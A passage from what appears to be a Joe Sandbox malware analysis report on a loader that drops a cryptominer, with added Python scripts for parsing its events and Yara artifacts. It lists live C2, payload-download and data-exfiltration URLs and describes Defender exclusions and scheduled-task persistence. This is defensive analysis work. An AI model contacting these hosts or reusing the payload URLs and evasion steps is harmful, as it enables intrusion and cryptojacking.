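    """Per-process event counts, distinct volume-query paths and triage flags."""
    report = defaultdict(lambda: {"events": Counter(), "paths": set(), "flags": set()})
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, event, detail = parsed
        entry = report[src]
        entry["events"][event] += 1
        if event == "Queries volume information":
            entry["paths"].add(detail)
        entry["flags"].update(image_flags(src))
        entry["flags"].update(event_flags(event, detail))
    return dict(report)


if __name__ == "__main__":
    for src, entry in summarize(SAMPLE).items():
        print(src, dict(entry["events"]), sorted(entry["flags"]))
```

Feed the whole exported report to summarize() rather than this excerpt and the per-process counts become the quickest way to see which of the dropped binaries did the AV enumeration and which ones only triggered the CLR's volume lookups on their own image and the GAC assemblies they load.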

                        Stealing of Sensitive Information

Source: Yara match | File source: 2.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1789363065.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1789584314.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
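The Yara-match list carries more information than it looks: the .unpack names give each process's module base, and the .sdmp names encode the dumped region's base address, page protection and memory type. Read together they show that the stealer rule fired twice per process, once in a read-write private buffer (the staged payload) and once in the module's own first section at base+0x1000 with execute-read-write protection, which is the in-place unpacking the "changes PE section rights" signature refers to. The Python below is an added example, not Joe Sandbox code: it decodes the twelve names listed above and correlates them. The field layout of the .sdmp names is inferred from these samples and is an assumption; the protection and memory-type fields line up with the Win32 PAGE_* and MEM_* constants, the meaning of the stage number is assumed, and the two fields whose meaning the page does not pin down are kept raw.

```python
"""Decode the artifact names in a Joe Sandbox Yara-match list.

Added example, not Joe Sandbox code.  Assumed .sdmp layout (inferred from the
names on this page):
  <proc>.<stage>.<dump id>.<base>.<protect>.<field 6>.<mem type>.<field 8>.sdmp
protect / mem type match the Win32 PAGE_* / MEM_* constants; fields 6 and 8
are not interpreted.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\.(?P<mtype>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE)
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+)\.(?P<base>[0-9a-f]+)\.(?P<idx>\d+)\.unpack$",
    re.IGNORECASE)

# Yara-match sources copied from this report.
YARA_HITS = [
    "2.2.axplong.exe.c20000.0.unpack",
    "6.2.axplong.exe.c20000.0.unpack",
    "0.2.file.exe.960000.0.unpack",
    "1.2.axplong.exe.c20000.0.unpack",
    "00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp",
    "00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp",
    "00000002.00000002.1789363065.0000000000C21000.00000040.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1789584314.0000000000C21000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp",
]


@dataclass(frozen=True)
class Artifact:
    name: str
    proc: int        # analysis process index (0 is file.exe in this report)
    stage: int       # dump phase; assumed: 2 = taken at process end, 3 = taken during execution
    base: int        # virtual base address of the dumped region / module
    protect: str     # PAGE_* name, "" for .unpack entries
    mem_type: str    # MEM_* name, "" for .unpack entries
    image: str       # module name for .unpack entries, "" for .sdmp

    @property
    def executable(self) -> bool:
        return "EXECUTE" in self.protect


def parse_artifact(name: str) -> Artifact:
    m = SDMP_RE.match(name)
    if m:
        prot, mtype = int(m["protect"], 16), int(m["mtype"], 16)
        return Artifact(name, int(m["proc"], 16), int(m["stage"], 16), int(m["base"], 16),
                        PAGE_PROTECT.get(prot, hex(prot)), MEM_TYPE.get(mtype, hex(mtype)), "")
    m = UNPACK_RE.match(name)
    if m:
        return Artifact(name, int(m["proc"]), int(m["stage"]), int(m["base"], 16), "", "", m["image"])
    raise ValueError("unrecognised Joe Sandbox artifact name: " + name)


def classify(a: Artifact) -> str:
    """Where the rule fired: the dumped module, its rewritten code, or a private buffer."""
    if a.image:
        return "unpacked PE"
    if a.mem_type == "MEM_IMAGE" and a.executable:
        return "code section rewritten in place"
    if a.mem_type == "MEM_PRIVATE" and not a.executable:
        return "staged payload buffer"
    return "other"


def correlate(names):
    """Group hits per process and tie each in-image dump to the unpacked module's base."""
    arts = [parse_artifact(n) for n in names]
    per_proc = defaultdict(lambda: {"image": None, "image_base": None, "hits": []})
    for a in arts:                       # first pass: learn each process's module base
        if a.image:
            per_proc[a.proc]["image"] = a.image
            per_proc[a.proc]["image_base"] = a.base
    for a in arts:                       # second pass: label the memory dumps
        if a.image:
            continue
        label = classify(a)
        entry = per_proc[a.proc]
        if label == "code section rewritten in place" and entry["image_base"] is not None:
            label += " (+%#x into %s)" % (a.base - entry["image_base"], entry["image"])
        entry["hits"].append((a.base, label))
    return dict(per_proc)


if __name__ == "__main__":
    for proc, entry in sorted(correlate(YARA_HITS).items()):
        print(proc, entry["image"], [(hex(b), lab) for b, lab in entry["hits"]])
```

For this report the output pairs every process with one staged buffer and one in-image hit at +0x1000, i.e. the payload is decrypted into a heap allocation and then written over the original module's first section; the .unpack files are the post-unpacking images Joe Sandbox reconstructed from those sections and are the ones to load into a disassembler.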
MITRE ATT&CK Matrix (numbers in parentheses are the signature counts shown beside the technique in the original matrix):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (1) | Valid Accounts | Windows Management Instrumentation (11) | Scripting (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (11) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (12) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (21) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (11) | Windows Service (1) | Windows Service (1) | Obfuscated Files or Information (31) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Scheduled Task/Job (11) | Process Injection (12) | Software Packing (13) | NTDS | System Information Discovery (237) | Distributed Component Object Model | Input Capture | Application Layer Protocol (114) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Scheduled Task/Job (11) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (861) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (121) | Cached Domain Credentials | Virtualization/Sandbox Evasion (361) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (361) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection (12) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph ID: 1520638 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100
Contacted domains: eijfrhegrtbrfcd.online, sanctam.net, github.com
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 14 other signatures

Process tree reconstructed from the graph (node ids in parentheses):

• file.exe (20): drops C:\Users\user\AppData\Local\...\axplong.exe (PE32) and C:\Users\user\...\axplong.exe:Zone.Identifier (ASCII); Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements; Potentially malicious time measurement code found
  → axplong.exe (31): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 6 other signatures
• axplong.exe (15): contacts 185.215.113.16 (ports 49737, 49738, 49740; WHOLESALECONNECTIONSNL, Portugal); drops C:\Users\user\...\loader_5879465914.exe and loader_5879465914[1].exe (PE32+); Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
  → loader_5879465914.exe (26): contacts eijfrhegrtbrfcd.online 172.67.187.100:443 (CLOUDFLARENETUS, United States); drops C:\Users\user\AppData\...\Microsoft-Edge.exe (PE32+); Found API chain indicative of debugger detection; starts cmd.exe (45), cmd.exe (47) and 40 other processes (54)
    → cmd.exe (45): starts miner2.0.exe (64), curl.exe (68), conhost.exe (70)
      → curl.exe (68): drops C:\Users\user\AppData\Local\...\miner2.0.exe (PE32+)
      → miner2.0.exe (64): drops C:\Users\user\AppData\Local\...\svchost64.exe (PE32+); Adds a directory exclusion to Windows Defender; starts cmd.exe (85), cmd.exe (87)
        → cmd.exe (87): Adds a directory exclusion to Windows Defender; starts powershell.exe (106, 108, 110) and 2 other processes (114); Loading BitLocker PowerShell Module (106)
        → cmd.exe (85): starts svchost64.exe (100), conhost.exe (104)
          → svchost64.exe (100): drops C:\Windows\System32\services64.exe (PE32+); Drops executables to the windows directory (C:\Windows) and starts them; starts services64.exe (116), cmd.exe (119), cmd.exe (121)
            → cmd.exe (119): starts conhost.exe (128), schtasks.exe (130); cmd.exe (121): starts conhost.exe (132), choice.exe (134)
            → services64.exe (116): Adds a directory exclusion to Windows Defender; starts cmd.exe (123), cmd.exe (126)
              → cmd.exe (123): Adds a directory exclusion to Windows Defender; starts powershell.exe (136, 139, 141) and 2 other processes (149); Loading BitLocker PowerShell Module (136)
              → cmd.exe (126): starts svchost64.exe (143), conhost.exe (147)
                → svchost64.exe (143): contacts github.com 140.82.121.3:443 (GITHUBUS, United States); drops C:\Windows\System32\...\sihost64.exe (PE32+) and C:\Windows\System32\Microsoft\Libs\WR64.sys (PE32+); Found strings related to Crypto-Mining; Sample is not signed and drops a device driver; starts cmd.exe (151)
    → cmd.exe (47): Adds a directory exclusion to Windows Defender; starts cscript.exe (72) and 2 other processes (78)
      → cscript.exe (72): Uses schtasks.exe or at.exe to add and modify task schedules; starts schtasks.exe (90) → conhost.exe (112)
      → 2 other processes (78): contact 127.0.0.1
• services64.exe (22): Adds a directory exclusion to Windows Defender; starts cmd.exe (33), cmd.exe (35)
  → cmd.exe (33): Adds a directory exclusion to Windows Defender; starts 5 other processes (56): Loading BitLocker PowerShell Module
  → cmd.exe (35): starts 2 other processes (58): Drops executables to the windows directory (C:\Windows) and starts them; these start 3 other processes (83) → conhost.exe (92), schtasks.exe (94), conhost.exe (96), choice.exe (98)
• 2 other processes (24): start cmd.exe (37), cmd.exe (39), cmd.exe (41) and 26 other processes (43); cmd.exe (37) and cmd.exe (41) each start conhost.exe

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial sample:
Source | Detection | Scanner | Label | Link
file.exe | 50% | ReversingLabs | Win32.Packed.Themida |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |

Dropped files:
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 50% | ReversingLabs | Win32.Trojan.Generic |
C:\Windows\System32\Microsoft\Libs\WR64.sys | 7% | ReversingLabs | |

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs:
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://185.215.113.16/Jo89Ku7d/index.php | 100% | URL Reputation | phishing |
Domains and IPs

Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
eijfrhegrtbrfcd.online | 172.67.187.100 | true | true | | unknown
github.com | 140.82.121.3 | true | false | | unknown
sanctam.net | unknown | unknown | false | | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://eijfrhegrtbrfcd.online/download/conf1.php | true | | unknown
https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= | false | | unknown
https://eijfrhegrtbrfcd.online/download/miner2.0.exe | false | | unknown
http://185.215.113.16/Jo89Ku7d/index.php | true | URL Reputation: phishing | unknown
https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip | false | | unknown
URLs from Memory and Binaries:
Name | Source | Malicious | Antivirus Detection | Reputation
0000000E.00000003.2399904766.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2879187208.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2510316366.000000000088E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                    unknown
                                                                                                                                    https://sanctam.net:58899svchost64.exe, 0000008B.00000002.2788969573.00000000036ED000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.0000000003736000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003554000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://185.215.113.16/Wiowaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://185.215.113.16/onesaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://185.215.113.16/Jo89Ku7d/index.phpB7Vaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                            unknown
                                                                                                                                            http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exeaxplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                              unknown
                                                                                                                                              http://185.215.113.16/4axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.phpM6axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  unknown
                                                                                                                                                  https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1loader_5879465914.exe, 00000007.00000003.2632263244.000000000377B000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2425064392.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481189507.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2496432695.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481058326.0000000003743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://185.215.113.16/7737D9ECF5C72AA370644axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://185.215.113.16/Jo89Ku7d/index.phpncodedJaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                        unknown
                                                                                                                                                        https://eijfrhegrtbrfcd.online/download/miner2.0.exePzcurl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.187.100 | eijfrhegrtbrfcd.online | United States | 13335 | CLOUDFLARENETUS | true
185.215.113.16 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520638
Start date and time: 2024-09-27 17:40:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 208
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.mine.winEXE@314/69@4/4
EGA Information:
• Successful, ratio: 15.4%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target axplong.exe, PID 7712 because there are no executed functions
• Execution Graph export aborted for target axplong.exe, PID 7728 because there are no executed functions
• Execution Graph export aborted for target file.exe, PID 7528 because it is empty
• Execution Graph export aborted for target miner2.0.exe, PID 5868 because it is empty
• Execution Graph export aborted for target services64.exe, PID 6264 because it is empty
• Execution Graph export aborted for target services64.exe, PID 6976 because it is empty
• Execution Graph export aborted for target sihost64.exe, PID 7008 because it is empty
• Execution Graph export aborted for target sihost64.exe, PID 7844 because it is empty
• Execution Graph export aborted for target svchost64.exe, PID 5992 because it is empty
• Execution Graph export aborted for target svchost64.exe, PID 6772 because it is empty
• Execution Graph export aborted for target svchost64.exe, PID 7732 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time | Type | Description
11:42:01 | API Interceptor | 585084x Sleep call for process: axplong.exe modified
11:42:06 | API Interceptor | 82x Sleep call for process: loader_5879465914.exe modified
11:42:09 | API Interceptor | 58x Sleep call for process: Microsoft-Edge.exe modified
11:42:34 | API Interceptor | 211x Sleep call for process: powershell.exe modified
11:42:47 | API Interceptor | 21x Sleep call for process: svchost64.exe modified
11:42:47 | API Interceptor | 6x Sleep call for process: sihost64.exe modified
16:41:04 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
16:42:07 | Task Scheduler | Run new task: Microsoft Edge path: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
16:42:39 | Task Scheduler | Run new task: services64 path: "C:\Windows\system32\services64.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.187.100 | INVOICE087667899.exe | malicious | Unknown | heygirlisheeverythingyouwantedinaman.com:443
185.215.113.16 | file.exe | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 185.215.113.16/Jo89Ku7d/index.php
 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
 | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.16/soka/random.exe
 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
 | file.exe | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | 185.215.113.16/Jo89Ku7d/index.php
140.82.121.3 | 6glRBXzk6i.exe | malicious | RedLine | github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
 | firefox.lnk | malicious | CobaltStrike | github.com/john-xor/temp/blob/main/index.html?raw=true
 | 0XzeMRyE1e.exe | malicious | Amadey, Vidar | github.com/neiqops/ajajaj/raw/main/file_22613.exe
 | MzRn1YNrbz.exe | malicious | Vidar | github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
eijfrhegrtbrfcd.online | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 104.21.64.194
| SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 104.21.64.194
| SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 172.67.187.100
| SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 104.21.64.194
| SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 172.67.187.100
| SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 104.21.64.194
| SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 104.21.64.194
github.com | PO#518464.js | Get hash | malicious | STRRAT | Browse | 140.82.121.4
| PO#518464.js | Get hash | malicious | STRRAT | Browse | 140.82.121.4
| Proof Of Payment.js | Get hash | malicious | STRRAT | Browse | 140.82.121.3
| Product Specification Wire-Mesh RQF 260924.sc.exe | Get hash | malicious | STRRAT | Browse | 140.82.121.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
GITHUBUS | https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.5-1/rubyinstaller-devkit-3.3.5-1-x64.exe | Get hash | malicious | Unknown | Browse | 140.82.121.4
| PO#518464.js | Get hash | malicious | STRRAT | Browse | 140.82.121.4
| PO#518464.js | Get hash | malicious | STRRAT | Browse | 140.82.121.4
| Proof Of Payment.js | Get hash | malicious | STRRAT | Browse | 140.82.121.4
| https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.5-1/rubyinstaller-devkit-3.3.5-1-x64.exe | Get hash | malicious | Unknown | Browse | 140.82.121.4
| https://telagremn.com/ | Get hash | malicious | Unknown | Browse | 140.82.114.22
| https://arjunshaw.github.io/4.7-Project-1-Netflix-/ | Get hash | malicious | HTMLPhisher | Browse | 140.82.112.21
| http://tokenpuzz1le.com/ | Get hash | malicious | HTMLPhisher | Browse | 140.82.114.22
| Product Specification Wire-Mesh RQF 260924.sc.exe | Get hash | malicious | STRRAT | Browse | 140.82.121.4
| https://tokenp0kczt.net/ | Get hash | malicious | HTMLPhisher | Browse | 140.82.121.6
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
| Quote #270924.exe | Get hash | malicious | FormBook | Browse | 172.67.165.25
| https://effective-teammates-567500.framer.app/ | Get hash | malicious | HTMLPhisher | Browse | 172.65.208.22
| ATT71817.docx | Get hash | malicious | HTMLPhisher | Browse | 188.114.96.3
| FoS5cjKhd3.exe | Get hash | malicious | LummaC | Browse | 104.21.4.136
| file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 172.67.162.108
| https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg== | Get hash | malicious | HTMLPhisher | Browse | 188.114.96.3
| 0225139776.docx.doc | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
| https://changeofscene.ladesk.com/605425-Secure-Business-Documen | Get hash | malicious | HTMLPhisher | Browse | 104.17.24.14
| https://careeligibility.vercel.app/chubedan | Get hash | malicious | HTMLPhisher | Browse | 172.67.75.166
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| kYpONUhAR5.exe | Get hash | malicious | RedLine | Browse | 185.215.113.67
| file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 185.215.113.103
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
